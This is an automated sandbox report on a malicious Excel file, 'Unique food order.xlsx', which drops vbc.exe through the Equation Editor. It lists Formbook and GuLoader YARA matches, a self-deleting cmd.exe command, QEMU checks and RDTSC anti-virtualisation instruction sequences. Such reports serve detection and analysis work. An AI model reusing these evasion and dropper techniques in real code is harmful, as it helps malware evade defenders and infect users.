      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009D781
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00082D90
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00089E2C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00089E30
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009DE55
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009DF6E
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CF93
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00082FB0
      Source: Unique food order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: Unique food order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E99E2A8 appears 34 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1EA0F970 appears 77 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E9E373B appears 237 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E9E3F92 appears 99 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E99DF5C appears 100 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E99E2A8 appears 34 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1EA0F970 appears 77 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E9E373B appears 237 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E9E3F92 appears 99 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 1E99DF5C appears 100 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020BE2A8 appears 38 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0212F970 appears 84 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 02103F92 appears 132 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0210373B appears 245 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020BDF5C appears 119 times
      Source: svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Unique food order.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Unique food order.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR80B.tmpJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR80B.tmpJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e................... .......................2.........*.......*.....
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................*.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys..............*.............................&.................*.....
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e................... .......................2.........*.......*.....
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................*.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys..............*.............................&.................*.....
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Unique food order.xlsxVirustotal: Detection: 24%
      Source: Unique food order.xlsxReversingLabs: Detection: 22%
      Source: Unique food order.xlsxVirustotal: Detection: 24%
      Source: Unique food order.xlsxReversingLabs: Detection: 22%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: Unique food order.xlsxStatic file information: File size 2303488 > 1048576
      Source: Unique food order.xlsxStatic file information: File size 2303488 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
      Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000002.2360415056.0000000000090000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
      Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000002.2360415056.0000000000090000.00000004.00000001.sdmp
      Source: Unique food order.xlsxInitial sample: OLE indicators vbamacros = False
      Source: Unique food order.xlsxInitial sample: OLE indicators vbamacros = False
      Source: Unique food order.xlsxInitial sample: OLE indicators encrypted = True
      Source: Unique food order.xlsxInitial sample: OLE indicators encrypted = True

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040984F push ecx; retf
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00409D50 push edi; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00409D55 push edi; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406910 pushad ; iretd
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004069F5 push EF15CAC2h; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040759B push FFFFFFC6h; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406653 pushad ; iretd
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406A98 pushfd ; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004082AF push FFFFFFDAh; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040A3DA push ecx; retf
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00407FAA push esp; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00407FB3 push ecx; retf
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040984F push ecx; retf
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00409D50 push edi; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00409D55 push edi; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406910 pushad ; iretd
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004069F5 push EF15CAC2h; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040759B push FFFFFFC6h; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406653 pushad ; iretd
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406A98 pushfd ; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004082AF push FFFFFFDAh; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040A3DA push ecx; retf
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00407FAA push esp; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00407FB3 push ecx; retf
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99DFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BDFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_000969BB push esi; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0008AB07 push ds; retf
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00094E05 push ss; retf
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CEA5 push eax; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CEFB push eax; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CEF2 push eax; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009CF5C push eax; ret
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: Unique food order.xlsxStream path 'EncryptedPackage' entropy: 7.99991703704 (max. 8.0)
      Source: Unique food order.xlsxStream path 'EncryptedPackage' entropy: 7.99991703704 (max. 8.0)

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: vbc.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: vbc.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000314F13 second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h 0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx 0x00000017 call 00007FA1E43650BCh 0x0000001c call 00007FA1E436508Ah 0x00000021 lfence 0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 pushad 0x00000031 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000314FA0 second address: 0000000000314FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E436548Dh 0x0000001f popad 0x00000020 call 00007FA1E4365161h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000001B4FA0 second address: 00000000001B4FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E46CBC9Dh 0x0000001f popad 0x00000020 call 00007FA1E46CB971h 0x00000025 lfence 0x00000028 rdtsc
